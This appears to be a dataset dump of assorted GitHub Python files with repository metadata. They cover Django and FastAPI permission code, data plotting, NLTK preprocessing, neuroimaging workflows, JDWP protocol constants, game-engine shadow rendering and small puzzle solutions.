\"\"\"Custom permission class to allow only message owners to edit them.\"\"\"\n\n    def has_object_permission(self, request, view, obj):\n        \"\"\"Return True if permission is granted to the message owner.\"\"\"\n        if isinstance(obj, Message):\n            return obj.user == 
request.user\n return obj.user == request.user\n","repo_name":"markmorcos/Botler.io","sub_path":"server/api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31301779714","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\n# Import data (Make sure to parse dates. Consider setting index column to 'date'.)\ndf = pd.read_csv('fcc-forum-pageviews.csv')\ndf = df.set_index('date')\n# Clean data\ndf = df[\n (df['value'] >= (df['value'].quantile(0.025))) & \n (df['value'] <= (df['value'].quantile(0.975))) \n ]\ndf.index = pd.to_datetime(df.index)\n\n\ndef draw_line_plot():\n \n# Draw line plot\n fig = plt.figure(figsize=(15,10))\n plt.plot(df.index, df['value'],color='red')\n plt.title('Daily freeCodeCamp Forum Page Views 5/2016-12/2019')\n plt.xlabel('Date')\n plt.ylabel('Page Views')\n\n # Save image and return fig (don't change this part)\n fig.savefig('line_plot.png')\n return fig\n\ndef draw_bar_plot():\n # Copy and modify data for monthly bar plot\n\n df_bar = df.copy()\n df_bar.reset_index(inplace=True)\n df_bar['Years'] = [d.year for d in df_bar.date]\n df_bar['Months'] = [d.strftime('%b') for d in df_bar.date]\n df_bar = df_bar.groupby([\"Years\", \"Months\"])[\"value\"].mean()\n df_bar = df_bar.unstack()\n\n clist_new = [\"Jan\",\"Feb\", \"Mar\", \"Apr\", \"May\",\"Jun\",\"Jul\",\"Aug\", \"Sep\",\"Oct\",\"Nov\",\"Dec\"]\n df_bar = df_bar[clist_new]\n \n # Draw bar plot\n fig = df_bar.plot(kind =\"bar\", legend = True, figsize = (15,10)).figure\n plt.xlabel(\"Years\", fontsize= 10)\n plt.ylabel(\"Average Page Views\", fontsize= 10)\n plt.legend(fontsize = 10, title=\"Months\",labels=[\"January\",\"February\", \"March\", \"April\", \"May\",\"June\",\"July\",\"August\", \"September\",\"October\",\"November\",\"December\"])\n\n # Save image and return fig (don't change this part)\n fig.savefig('bar_plot.png')\n return fig\n\ndef draw_box_plot():\n # Prepare data for box plots\n df_box = df.copy()\n df_box.reset_index(inplace=True)\n df_box['year'] = [d.year for d in df_box.date]\n df_box['month'] = [d.strftime('%b') for d in df_box.date]\n\n # Draw box plot\n fig,ax = plt.subplots(nrows=1,ncols=2)\n fig.set_size_inches(12, 5)\n fig.tight_layout(pad=4)\n sns.boxplot(x = df_box['year'], y = df_box['value'], ax = ax[0]).set(xlabel='Year', ylabel='Page Views')\n sns.boxplot(x = df_box['month'], y = df_box['value'],order=[\"Jan\",\"Feb\", \"Mar\", \"Apr\", \"May\",\"Jun\",\"Jul\",\"Aug\", \"Sep\",\"Oct\",\"Nov\",\"Dec\"], ax = ax[1]).set(xlabel='Month', ylabel='Page Views')\n\n ax[0].set_title('Year-wise Box Plot (Trend)')\n ax[1].set_title('Month-wise Box Plot (Seasonality)')\n\n\n # Save image and return fig (don't change this part)\n fig.savefig('box_plot.png')\n return fig","repo_name":"Pierre-Andreatta/FreeCodeCamp","sub_path":"Data_Analysis_with_Python/time_series_visualizer.py","file_name":"time_series_visualizer.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"44296010254","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function, division\n\nimport json\nimport math\nfrom .abstract_transform import AbstractTransform\nimport numpy as np\n\nclass Pad(AbstractTransform):\n \"\"\"\n 
Pad the image (shape [C, D, H, W] or [C, H, W]) to an new spatial shape, \n the real output size will be max(image_size, output_size)\n \"\"\"\n\n def __init__(self, output_size, ceil_mode=False):\n \"\"\"\n output_size (tuple/list): the size along each spatial axis. \n ceil_mode (bool): if true, the real output size is integer multiples of output_size.\n \"\"\"\n self.output_size = output_size\n self.ceil_mode = ceil_mode\n\n def __call__(self, sample):\n image = sample['image']\n input_shape = image.shape\n input_dim = len(input_shape) - 1\n if (self.ceil_mode):\n multiple = [int(math.ceil(float(input_shape[1 + i]) / self.output_size[i])) \\\n for i in range(input_dim)]\n output_size = [multiple[i] * self.output_size[i] \\\n for i in range(input_dim)]\n else:\n output_size = self.output_size\n margin = [max(0, output_size[i] - input_shape[1 + i]) for i in range(input_dim)]\n margin_lower = [int(margin[i] / 2) for i in range(input_dim)]\n margin_upper = [margin[i] - margin_lower[i] for i in range(input_dim)]\n pad = [(margin_lower[i], margin_upper[i]) for i in range(input_dim)]\n pad = tuple([(0, 0)] + pad)\n\n image_t = np.pad(image, pad, 'constant', constant_values=0) if (max(margin) > 0) else image\n\n sample['image'] = image_t\n\n if 'coord' in sample:\n sample['coord'] = sample['coord'] + margin_lower\n if 'label' in sample:\n label = sample['label']\n label = np.pad(label, pad, 'constant', constant_values=0) if (max(margin) > 0) else label\n sample['label'] = label\n if 'mask' in sample:\n mask = sample['mask']\n mask = np.pad(mask, pad, 'constant', constant_values=0) if (max(margin) > 0) else mask\n sample['mask'] = mask\n\n return sample\n","repo_name":"FeijiangHan/CTISPED","sub_path":"AANet-3D/transform/pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"39"} +{"seq_id":"39332163950","text":"from utilities import load_data_csv_to_dataframe\nimport nltk\nimport string\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom utilities import save_data_dataframe_to_csv\nnltk.download('punkt')\nnltk.download('stopwords')\n\n\ndef preprocess_file(filename):\n data = load_data_csv_to_dataframe(filename)\n for index, row in data.iterrows():\n text = row['comment_text']\n text = remove_puntucation(text)\n text = tokennize(text)\n text = fileter_stopwords(text)\n row['comment_text'] = text\n data.at[index,'comment_text'] = text\n\n return data\n\n\ndef remove_puntucation(sentence):\n sentence = \"\".join([char for char in sentence if char not in string.punctuation])\n return sentence\n\n\ndef tokennize(sentece):\n\n words = word_tokenize(sentece)\n return words\n\ndef fileter_stopwords(words):\n stop_words = stopwords.words('english')\n words = [word for word in words if word not in stop_words]\n return words\n\ndef stemming(words):\n porter = PorterStemmer()\n words = [porter.stem(word) for word in words]\n return words\n\n\n","repo_name":"deveshiitkgp2013/NLP_Project","sub_path":"data_preprocessing/nltk_preprocessing.py","file_name":"nltk_preprocessing.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41112672174","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWorkflows to grab input file structures.\n\"\"\"\nimport logging as log\nimport os\n\nimport nipype.pipeline.engine as pe\nfrom hansel.operations import 
joint_value_map, valuesmap_to_dict\nfrom nipype.interfaces.io import DataSink\nfrom nipype.interfaces.utility import IdentityInterface\n\nfrom neuro_pypes import configuration\nfrom neuro_pypes.crumb import DataCrumb\nfrom neuro_pypes.utils import extend_trait_list, joinstrings\n\n\ndef build_crumb_workflow(wfname_attacher, data_crumb, in_out_kwargs, output_dir,\n cache_dir='', wf_name=\"main_workflow\"):\n \"\"\" Returns a workflow for the give `data_crumb` with the attached workflows\n given by `attach_functions`.\n\n Parameters\n ----------\n wfname_attacher: dict[Str] -> function\n Dictionary with name of the workflow and its corresponding\n attach function that will be in charge of attaching workflows\n to the main input/output workflow.\n\n data_crumb: hansel.Crumb\n The crumb until the subject files.\n Example: Crumb('/home/hansel/cobre/raw/{subject_id}/session_1/{modality}/{image_file})\n At least one crumb arguments of `data_crumb` must be open,\n this argument will be replaced by the corresponding image name.\n\n in_out_kwargs: dict with keyword arguments\n This arguments are for the in_out_crumb_wf.\n Mainly 'files_crumb_args' which will declare the values each file\n type the crumb arguments in `data_crumb` must be replaced with.\n Example:\n {'anat': [('modality', 'anat_1'),\n ('image', 'mprage.nii.gz')],\n 'rest': [('modality', 'rest_1'),\n ('image', 'rest.nii.gz')],\n }\n\n cache_dir: str\n The working directory of the workflow.\n\n output_dir: str\n The output folder path.\n\n wf_name: str\n Name of the main workflow.\n\n Returns\n -------\n wf: Nipype Workflow\n \"\"\"\n if not data_crumb.exists():\n raise IOError(\"Expected an existing folder for `data_crumb`, got {}.\".format(data_crumb))\n\n if not data_crumb.isabs():\n raise IOError(\"Expected an absolute Crumb path for `data_crumb`, got {}.\".format(data_crumb))\n\n if not wfname_attacher or wfname_attacher is None:\n raise ValueError(\n \"Expected `wfname_attacher` to have at least one function, \"\n \"got {}.\".format(wfname_attacher)\n )\n\n # if not in_out_kwargs or in_out_kwargs is None:\n # raise ValueError(\"Expected `in_out_kwargs` to have at least the name for sets of parameters for \"\n # \" `data_crumb`, got {}.\".format(in_out_kwargs))\n\n # check some args\n if not cache_dir:\n cache_dir = os.path.join(os.path.dirname(output_dir), \"wd\")\n\n # print the configuration parameters\n log.info('Using the following configuration parameters:')\n log.info(configuration)\n\n # generate the workflow\n main_wf = crumb_wf(\n work_dir=cache_dir,\n data_crumb=data_crumb,\n output_dir=output_dir,\n file_templates=in_out_kwargs,\n wf_name=wf_name\n )\n\n for wf_name, attach_wf in wfname_attacher.items():\n main_wf = attach_wf(main_wf=main_wf, wf_name=wf_name)\n\n # move the crash files folder elsewhere\n main_wf.config[\"execution\"][\"crashdump_dir\"] = os.path.join(main_wf.base_dir, main_wf.name, \"log\")\n\n log.info('Workflow created.')\n\n return main_wf\n\n\ndef crumb_wf(work_dir, data_crumb, output_dir, file_templates,\n wf_name=\"main_workflow\"):\n \"\"\" Creates a workflow with the `subject_session_file` input nodes and an empty `datasink`.\n The 'datasink' must be connected afterwards in order to work.\n\n Parameters\n ----------\n work_dir: str\n Path to the workflow temporary folder\n\n data_crumb: hansel.Crumb\n The crumb until the subject files.\n Example: Crumb('/home/hansel/data/{subject_id}/{session_id}/{modality}/{image_file})\n\n output_dir: str\n Path to where the datasink will leave the 
results.\n\n file_templates: Dict[str -> list of 2-tuple]\n Maps of crumb argument values to specify each file in the `data_crumb`.\n Example: {'anat': [('modality', 'anat'), ('image_file', 'anat_hc.nii.gz')],\n 'pet': [('modality', 'pet'), ('image_file', 'pet_fdg.nii.gz')],\n }\n\n wf_name: str\n Name of the main workflow\n\n Returns\n -------\n wf: Workflow\n \"\"\"\n # create the root workflow\n wf = pe.Workflow(name=wf_name, base_dir=work_dir)\n\n # datasink\n datasink = pe.Node(\n DataSink(parameterization=False, base_directory=output_dir, ),\n name=\"datasink\"\n )\n\n # input workflow\n # (work_dir, data_crumb, crumb_arg_values, files_crumb_args, wf_name=\"input_files\"):\n select_files = pe.Node(\n DataCrumb(crumb=data_crumb, templates=file_templates, raise_on_empty=False),\n name='selectfiles'\n )\n\n # basic file name substitutions for the datasink\n undef_args = select_files.interface._infields\n substitutions = [(name, \"\") for name in undef_args]\n substitutions.append((\"__\", \"_\"))\n\n datasink.inputs.substitutions = extend_trait_list(datasink.inputs.substitutions,\n substitutions)\n\n # Infosource - the information source that iterates over crumb values map from the filesystem\n infosource = pe.Node(interface=IdentityInterface(fields=undef_args), name=\"infosrc\")\n infosource.iterables = list(valuesmap_to_dict(joint_value_map(data_crumb, undef_args)).items())\n infosource.synchronize = True\n\n # connect the input_wf to the datasink\n joinpath = pe.Node(joinstrings(len(undef_args)), name='joinpath')\n\n # Connect the infosrc node to the datasink\n input_joins = [(name, 'arg{}'.format(arg_no + 1))\n for arg_no, name in enumerate(undef_args)]\n\n wf.connect([\n (infosource, select_files, [(field, field) for field in undef_args]),\n (select_files, joinpath, input_joins),\n (joinpath, datasink, [(\"out\", \"container\")]),\n ],\n )\n\n return wf\n","repo_name":"Neurita/pypes","sub_path":"neuro_pypes/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"34954057167","text":"\"\"\"PyJDWP Constants.\"\"\"\n\ncmd_map = {\n \"VM::Version\": (1, 1),\n \"VM::ClassesBySignature\": (1, 2),\n \"VM::AllClasses\": (1, 3),\n \"VM::AllThreads\": (1, 4),\n \"VM::TopLevelThreadGroups\": (1, 5),\n \"VM::Dispose\": (1, 6),\n \"VM::IDSizes\": (1, 7),\n \"VM::Suspend\": (1, 8),\n \"VM::Resume\": (1, 9),\n \"VM::Exit\": (1, 10),\n \"VM::CreateString\": (1, 11),\n \"VM::Capabilities\": (1, 12),\n \"VM::ClassPaths\": (1, 13),\n \"VM::DisposeObjects\": (1, 14),\n \"VM::HoldEvents\": (1, 15),\n \"VM::ReleaseEvents\": (1, 16),\n \"VM::CapabilitiesNew\": (1, 17),\n \"VM::RedefineClasses\": (1, 18),\n \"VM::SetDefaultStratum\": (1, 19),\n \"VM::AllClassesWithGeneric\": (1, 20),\n \"VM::InstanceCounts\": (1, 21),\n \"EventRequest::Set\": (15, 1),\n \"Event::Composite\": (64, 100),\n}\n\njni_types = (\"[\", \"L\", \"Z\", \"B\", \"C\", \"S\", \"I\", \"J\", \"F\", \"D\")\n\n# Errors Constants\nNONE = 0\nINVALID_THREAD = 10\nINVALID_THREAD_GROUP = 11\nINVALID_PRIORITY = 12\nTHREAD_NOT_SUSPENDED = 13\nTHREAD_SUSPENDED = 14\nTHREAD_NOT_ALIVE = 15\nINVALID_OBJECT = 20\nINVALID_CLASS = 21\nCLASS_NOT_PREPARED = 22\nINVALID_METHODID = 23\nINVALID_LOCATION = 24\nINVALID_FIELDID = 25\nINVALID_FRAMEID = 30\nNO_MORE_FRAMES = 31\nOPAQUE_FRAME = 32\nNOT_CURRENT_FRAME = 33\nTYPE_MISMATCH = 34\nINVALID_SLOT = 35\nDUPLICATE = 40\nNOT_FOUND = 41\nINVALID_MONITOR = 50\nNOT_MONITOR_OWNER = 
51\nINTERRUPT = 52\nINVALID_CLASS_FORMAT = 60\nCIRCULAR_CLASS_DEFINITION = 61\nFAILS_VERIFICATION = 62\nADD_METHOD_NOT_IMPLEMENTED = 63\nSCHEMA_CHANGE_NOT_IMPLEMENTED = 64\nINVALID_TYPESTATE = 65\nHIERARCHY_CHANGE_NOT_IMPLEMENTED = 66\nDELETE_METHOD_NOT_IMPLEMENTED = 67\nUNSUPPORTED_VERSION = 68\nNAMES_DONT_MATCH = 69\nCLASS_MODIFIERS_CHANGE_NOT_IMPLEMENTED = 70\nMETHOD_MODIFIERS_CHANGE_NOT_IMPLEMENTED = 71\nNOT_IMPLEMENTED = 99\nNULL_POINTER = 100\nABSENT_INFORMATION = 101\nINVALID_EVENT_TYPE = 102\nILLEGAL_ARGUMENT = 103\nOUT_OF_MEMORY = 110\nACCESS_DENIED = 111\nVM_DEAD = 112\nINTERNAL = 113\nUNATTACHED_THREAD = 115\nINVALID_TAG = 500\nALREADY_INVOKING = 502\nINVALID_INDEX = 503\nINVALID_LENGTH = 504\nINVALID_STRING = 506\nINVALID_CLASS_LOADER = 507\nINVALID_ARRAY = 508\nTRANSPORT_LOAD = 509\nTRANSPORT_INIT = 510\nNATIVE_METHOD = 511\nINVALID_COUNT = 512\n\nerror_messages = {\n 0: \"No error has occurred.\",\n 10: \"Passed thread is null, is not a valid thread or has exited.\",\n 11: \"Thread group invalid.\",\n 12: \"Invalid priority.\",\n 13: \"If the specified thread has not been suspended by an event.\",\n 14: \"Thread already suspended.\",\n 15: \"Thread has not been started or is now dead.\",\n 20: \"If this reference type has been unloaded and garbage collected.\",\n 21: \"Invalid class.\",\n 22: \"Class has been loaded but not yet prepared.\",\n 23: \"Invalid method.\",\n 24: \"Invalid location.\",\n 25: \"Invalid field.\",\n 30: \"Invalid jframeID.\",\n 31: \"There are no more Java or JNI frames on the call stack.\",\n 32: \"Information about the frame is not available.\",\n 33: \"Operation can only be performed on current frame.\",\n 34: \"The variable is not an appropriate type for the function used.\",\n 35: \"Invalid slot.\",\n 40: \"Item already set.\",\n 41: \"Desired element not found.\",\n 50: \"Invalid monitor.\",\n 51: \"This thread doesn't own the monitor.\",\n 52: \"The call has been interrupted before completion.\",\n 60: \"The virtual machine attempted to read a class file and determined that the file is malformed or otherwise cannot be interpreted as a class file.\",\n 61: \"A circularity has been detected while initializing a class.\",\n 62: \"The verifier detected that a class file, though well formed, contained some sort of internal inconsistency or security problem.\",\n 63: \"Adding methods has not been implemented.\",\n 64: \"Schema change has not been implemented.\",\n 65: \"The state of the thread has been modified, and is now inconsistent.\",\n 66: \"A direct superclass is different for the new class version, or the set of directly implemented interfaces is different and canUnrestrictedlyRedefineClasses is false.\",\n 67: \"The new class version does not declare a method declared in the old class version and canUnrestrictedlyRedefineClasses is false.\",\n 68: \"A class file has a version number not supported by this VM.\",\n 69: \"The class name defined in the new class file is different from the name in the old class object.\",\n 70: \"The new class version has different modifiers and and canUnrestrictedlyRedefineClasses is false.\",\n 71: \"A method in the new class version has different modifiers than its counterpart in the old class version and and canUnrestrictedlyRedefineClasses is false.\",\n 99: \"The functionality is not implemented in this virtual machine.\",\n 100: \"Invalid pointer.\",\n 101: \"Desired information is not available.\",\n 102: \"The specified event type id is not recognized.\",\n 103: \"Illegal argument.\",\n 110: \"The 
function needed to allocate memory and no more memory was available for allocation.\",\n 111: \"Debugging has not been enabled in this virtual machine. JVMTI cannot be used.\",\n 112: \"The virtual machine is not running.\",\n 113: \"An unexpected internal error has occurred.\",\n 115: \"The thread being used to call this function is not attached to the virtual machine. Calls must be made from attached threads.\",\n 500: \"object type id or class tag.\",\n 502: \"Previous invoke not complete.\",\n 503: \"Index is invalid.\",\n 504: \"The length is invalid.\",\n 506: \"The string is invalid.\",\n 507: \"The class loader is invalid.\",\n 508: \"The array is invalid.\",\n 509: \"Unable to load the transport.\",\n 510: \"Unable to initialize the transport.\",\n 512: \"The count is invalid.\",\n}\n","repo_name":"tamentis/pyjdwp","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"11947119284","text":"ALL = set(\"GIN, WHISKEY, RUM, TEQUILA, BOURBON, BRANDY, ABSINTHE, TRIPLESEC, LIQUER, VODKA, BARLEY, RYE, SAKE, COGNAC, MEZCAL\".split(\", \"))\n\nn = int(input())\n\nleft = set(ALL)\ncan = [set() for _ in range(n)]\n\nfor i in range(n):\n like = input().split(\", \")\n dislike = input().split(\", \")\n\n for drink in dislike:\n if drink in left:\n left.remove(drink)\n\n for drink in like:\n can[i].add(drink)\n\nresult = True\n\nfor i in range(n):\n found = False\n\n for drink in can[i]:\n if drink in left:\n found = True\n\n result = result and found\n\nif result:\n print(\"its lit\")\nelse:\n print(\"not lit\")\n","repo_name":"bradyz/sandbox","sub_path":"challenges/ut_acm_4_7_17/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"35929047639","text":"N, L = map(int, input().split())\ndiff = 10**100\nans = None\n\numami_all = N*L + N*(N+1)//2 - N\nfor i in range(1, N+1):\n umami_part = umami_all - (L + i - 1)\n d = abs(umami_all - umami_part)\n if d < diff:\n diff = d\n ans = umami_part\n\nprint(ans)\n","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/abc131_b.py","file_name":"abc131_b.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23545234515","text":"\"\"\"\nindi game engine\ncharacter with shadow\n\n\"\"\"\nimport igeCore as core\nfrom igeCore import devtool\nfrom igeCore.apputil import graphicsHelper\nimport igeVmath as vmath\nimport os.path\nfrom char import Character\nfrom cam import TargetCamera\nfrom controller import Controller\n\ndevtool.convertAssets('.','.', core.TARGET_PLATFORM_MOBILE)\ncore.window(True, 480, 640)\n\ncore.shaderGenerator().globalShadowBias = 0.001\n\n#core.autoSaveShader('shaders')\n\n#The character shadow is specified to be set at the time of conversion by figure.conf.\n#See Sapphiart/figure.conf\nchar = Character()\n\ncam = TargetCamera()\ncontroller = Controller()\n\n\nground = graphicsHelper.createSprite(20.0,20.0,texture ='images/Dirt-2290', normal=(0,1,0))\n#add shadow shader \nfor i in range(ground.numMaterials):\n shaderGen = ground.getShaderGenerator(i)\n shaderGen.setShadow(False,True,True)\n ground.setShaderGenerator(i, shaderGen)\n\n#create shadow buffer\nshadowBuffer = core.texture('Shadow', 1024,1024, format=core.GL_RED, depth=True, 
float=True)\n\n\nefig = graphicsHelper.createSprite(100, 100,shadowBuffer)\nefig.position = vmath.vec3(-100, 200, 0)\n\n# what you want to draw should be registered in showcase\nshowcase2D = core.showcase('2dcase')\nshowcase3D = core.showcase(\"3dcase\")\n\nshowcase3D.add(ground)\nshowcase3D.add(char.figure)\n\nshowcase2D.add(efig)\nshowcase2D.add(controller.frame)\nshowcase2D.add(controller.button)\n\nshowcase3D.addShadowBuffer(shadowBuffer)\n\n#set shadow environment\nenv = core.environment()\nenv.setDirectionalLampDirection(0, (5,5,5))\nenv.shadowColor = (0.0, 0.0, 0.0)\nenv.shadowDensity = 0.7\nenv.shadowWideness = 12.0\nenv.ambientColor = (0.2,0.2,0.2)\n\nshowcase3D.add(env)\n\n\ncam2D = core.camera('2dcam')\ncam2D.orthographicProjection = True\ncam2D.position = (0, 0, 100)\n\nloop = True\nwhile loop:\n core.update()\n dv = 0.0\n moveVector = vmath.vec3(0.0, 0.0, 0.0)\n\n touch = core.singleTouch()\n if touch is not None:\n moveVector = vmath.vec3(touch['cur_x'] - touch['org_x'], 0, -(touch['cur_y'] - touch['org_y']))\n d = vmath.length(moveVector)\n\n viewMat = cam.getWalkThroughMatrix()\n moveVector = vmath.vec3(viewMat * moveVector)\n char.step(moveVector)\n cam.step(char.figure)\n controller.step()\n\n cam.camera.shoot(showcase3D, shadowBuffer, renderPass=core.PASS_SHADOW)\n cam.camera.shoot(showcase3D)\n cam2D.shoot(showcase2D, clearColor=False)\n\n core.swap()\n","repo_name":"indigames/pyxieTutorials","sub_path":"shadow02/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"13969151940","text":"\"\"\"Controller functions and routes for authorization CRUD.\"\"\"\n\nfrom fastapi import APIRouter, Header, Response, status\nfrom pydantic import BaseModel\nfrom models.Token import Token\nfrom models.Account import Account\n\nrouter = APIRouter()\n\n\nclass UpdateAuthorizationRequestBody(BaseModel):\n \"\"\"Request body model.\"\"\"\n authorization: dict\n app_id: str\n email: str\n\n\n@router.get('/authorizations', tags=['Authorization'])\ndef get_accounts_with_authorization(response: Response,\n app_id: str,\n db_filter: str,\n value: str,\n authorization: str = Header(default=None)):\n \"\"\"Gets all accounts with specified authorizations.\n\n It may be necessary to query all accounts with a certain\n authorization. 
This endpoint can query accounts and return that\n list of accounts.\n \"\"\"\n\n # Get read permissions of the requesting account.\n requesting_account = Token.decode_token(authorization.split(' ')[1])\n requesting_account = Account.find_by_email(requesting_account['email'])\n read_permissions: dict = requesting_account.authorizations.get(\n app_id, {}).get('_read', {})\n\n # If requesting user has permission, return accounts data.\n if read_permissions.get(\n '_superuser', False) is True or read_permissions.get(\n db_filter, False) is True:\n accounts = Account.find_by_authorization(app_id, db_filter, value)\n else:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\n 'error': \"\"\"This account is not authorized to write to this user's authorization(s).\"\"\"\n }\n\n return {\n 'accounts': accounts\n }\n\n\n@router.put('/update-authorization', tags=['Authorization'])\ndef update_authorization(response: Response,\n body: UpdateAuthorizationRequestBody,\n authorization: str = Header(default=None)):\n \"\"\"Updates the authorization for a user for a given app.\n\n Apps can store data under each account regarding authorization.\n Apps can pass a dictionary to this endpoint which will be stored in\n the user's account. If no record exists for the app ID, a new\n record will be created. If a record already exists, it will be\n replaced with the new data.\n \"\"\"\n\n # Get write permissions of the requesting account.\n requesting_account = Token.decode_token(authorization.split(' ')[1])\n requesting_account = Account.find_by_email(requesting_account['email'])\n write_permissions: dict = requesting_account.authorizations.get(\n body.app_id, {}).get('_write', {})\n\n account = Account.find_by_email(body.email)\n\n # Ensure this user has permission to update this authorization.\n can_write_permissions: bool = write_permissions.get('_superuser', False)\n if not can_write_permissions:\n existing_authorization_keys = list(\n account.authorizations.get(body.app_id, {}).keys())\n future_authorization_keys = list(body.authorization.keys())\n authorization_key_change_delta = list(\n set(existing_authorization_keys).difference(\n set(future_authorization_keys)))\n changing_keys = future_authorization_keys + authorization_key_change_delta\n\n has_individual_permissions = True\n for key in changing_keys:\n if not write_permissions.get(key, False):\n has_individual_permissions = False\n break\n can_write_permissions = has_individual_permissions\n\n # If requesting user has permission, write new permissions to the database.\n if can_write_permissions:\n account.update_authorization(body.app_id, body.authorization)\n account.update()\n else:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\n 'error': \"\"\"This account is not authorized to write to this user's authorization(s).\"\"\"\n }\n\n return {\n 'authorizations': account.authorizations\n }\n\n\n@router.delete('/delete-authorization', tags=['Authorization'])\ndef remove_authorization(response: Response,\n app_id: str,\n email: str,\n authorization: str = Header(default=None)):\n \"\"\"Removes a record of authorization from a user's account.\n\n Takes a value for app_id, then removes the entire record of\n authorization for that app in the user's account.\n \"\"\"\n\n # Get write permissions of the requesting account.\n requesting_account = Token.decode_token(authorization.split(' ')[1])\n requesting_account = Account.find_by_email(requesting_account['email'])\n write_permissions: dict = 
requesting_account.authorizations.get(\n        app_id, {}).get('_write', {})\n\n    # If requesting user has permission,\n    # delete app permission(s) from the database.\n    if write_permissions.get('_superuser', False) is True:\n        account = Account.find_by_email(email)\n    else:\n        response.status_code = status.HTTP_400_BAD_REQUEST\n        return {\n            'error': \"\"\"This account is not authorized to delete this user's authorization(s).\"\"\"\n        }\n\n    try:\n        account.remove_authorization(app_id)\n\n    except RuntimeError as _:\n        response.status_code = status.HTTP_400_BAD_REQUEST\n        return {\n            'authorizations': account.authorizations,\n            'message': 'This authorization already does not exist.'\n        }\n\n    account.update()\n\n    return {\n        'authorizations': account.authorizations\n    }\n","repo_name":"mboeren/auth-service","sub_path":"controllers/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"42807859059","text":"from django.urls import path\n\nfrom .views import BlogCreate, BlogDetail, BlogCategoryCreate, BlogCategoryDetail, TagCreate, TagDetail\n\n#Blog url pattern\nurlpatterns = [\n    path('', BlogCreate.as_view(), name=\"blogs\"),\n    path('<int:pk>/', BlogDetail.as_view(), name=\"blog\"),\n    path('tags', TagCreate.as_view(), name=\"tags\"),\n    path('tags/<int:pk>', TagDetail.as_view(), name=\"tag\"),\n    path('categories', BlogCategoryCreate.as_view(), name=\"categories\"),\n    path('categories/<int:pk>', BlogCategoryDetail.as_view(), name=\"category\")\n]\n","repo_name":"AhmetKadayfc/fylo-backend","sub_path":"src/modules/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34752882709","text":"# O(ws + nm.8^s) time | O(ws + nm) space where s is the length of the largest word\ndef boggleBoard(board, words):\n    trie = Trie()\n    for word in words:\n        trie.addWord(word)\n    visited = [[False for i in row] for row in board]\n    finalWords = {}\n    for i in range(len(board)):\n        for j in range(len(board[0])):\n            explore(i, j, board, trie.root, visited, finalWords)\n\n    return list(finalWords.keys())\n\n\ndef explore(i, j, board, trie, visited, finalWord):\n    if visited[i][j]:\n        return\n    char = board[i][j]\n    if char not in trie:\n        return\n    visited[i][j] = True\n    trieNode = trie[char]\n    if \"*\" in trieNode:\n        finalWord[trieNode[\"*\"]] = True\n    list_of_neighbors = getNeighbors(i, j, board)\n    for neighbor in list_of_neighbors:\n        explore(neighbor[0], neighbor[1], board, trieNode, visited, finalWord)\n    visited[i][j] = False\n\n\ndef getNeighbors(i, j, board):\n    neighbors = []\n    possibleDirections = [\n        (-1, 0),\n        (-1, 1),\n        (0, 1),\n        (1, 1),\n        (1, 0),\n        (1, -1),\n        (0, -1),\n        (-1, -1),\n    ]\n    for direction in possibleDirections:\n        di, dj = direction\n        newI, newJ = i + di, j + dj\n        if 0 <= newI < len(board) and 0 <= newJ < len(board[0]):\n            neighbors.append([newI, newJ])\n    return neighbors\n\n\nclass Trie:\n    def __init__(self):\n        self.root = {}\n        self.endSymbol = \"*\"\n\n    def addWord(self, word):\n        current = self.root\n        for char in word:\n            if char not in current:\n                current[char] = {}\n            current = current[char]\n        current[self.endSymbol] = word\n","repo_name":"rimijoker/Coding-Interview-Practice","sub_path":"Algoexpert/Hard/Boggle Board.py","file_name":"Boggle Board.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} 
